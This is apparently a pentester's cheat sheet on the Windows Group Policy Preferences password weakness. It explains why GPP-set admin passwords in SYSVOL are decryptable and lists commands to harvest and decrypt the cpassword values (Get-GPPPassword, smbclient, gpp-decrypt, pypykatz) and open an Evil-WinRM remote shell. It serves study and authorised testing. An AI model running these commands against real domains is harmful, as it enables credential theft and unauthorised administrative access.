Group Policy Preferences

Theory

Windows systems come with a built-in Administrator (with an RID of 500) that most organizations want to change the password of. This can be achieved in multiple ways but there is one that is to be avoided: setting the built-in Administrator's password through Group Policies.

• Issue 1: the password is set to be the same for every (set of) machine(s) the Group Policy applies to. If the attacker finds the admin's hash or password, he can gain administrative access to all (or set of) machines.

• Issue 2: by default, knowing the built-in Administrator's hash (RID 500) allows for powerful Pass-the-Hash attacks (read more).

• Issue 3: all Group Policies are stored in the Domain Controllers' SYSVOL share. All domain users have read access to it. This means all domain users can read the encrypted password set in Group Policy Preferences, and since Microsoft published the encryption key around 2012, the password can be decrypted🤷‍♂️.

Practical

# with a NULL session
Get-GPPPassword.py -no-pass 'DOMAIN_CONTROLLER'

# with cleartext credentials
Get-GPPPassword.py 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'

# pass-the-hash
Get-GPPPassword.py -hashes 'LMhash':'NThash' 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'

SYSVOL

smbclient -U 'Username' \\\\<IP>\\SYSVOL

# Download Policy.xml file
get Policy.xml

Decrypt the Password (Manual)

pypykatz gppass j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw

gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw

Decrypt CPassword (Tool)

gpp-decrypt.rb

# Download
https://github.com/3ls3if/Cybersecurity-Tools/blob/main/ruby-tools/gpp-decrypt.rb

# Run
ruby gpp-decrypt.rb

gpp-decrypt.py

# Download 
git clone https://github.com/t0thkr1s/gpp-decrypt

# Installation
python3 setup.py install

# Run
python3 gpp-decrypt.py -f [groups.xml]
or
python3 gpp-decrypt.py -c [cpassword]

Get Remote Shell Access

Evil-WinRM

sudo docker run --rm -ti --name evil-winrm  oscarakaelvis/evil-winrm -i <IP> -u <svc_dbbackup> -p '<password>'

REFERENCES

• https://www.thehacker.recipes/a-d/movement/credentials/dumping/group-policies-preferences

• https://www.hackingarticles.in/credential-dumping-group-policy-preferences-gpp/#:~:text=Exploiting%20Group%20Policy%20Preferences%20via%20Metasploit%20%2DI,-As%20we%20know&text=This%20module%20enumerates%20files%20from,using%20Microsoft's%20public%20AES%20key.

• https://podalirius.net/en/articles/exploiting-windows-group-policy-preferences/

• https://www.mindpointgroup.com/blog/privilege-escalation-via-group-policy-preferences-gpp

• https://blog.carnal0wnage.com/2012/10/group-policy-preferences-and-getting.html

• https://github.com/3ls3if/Cybersecurity-Tools/tree/main/ruby-tools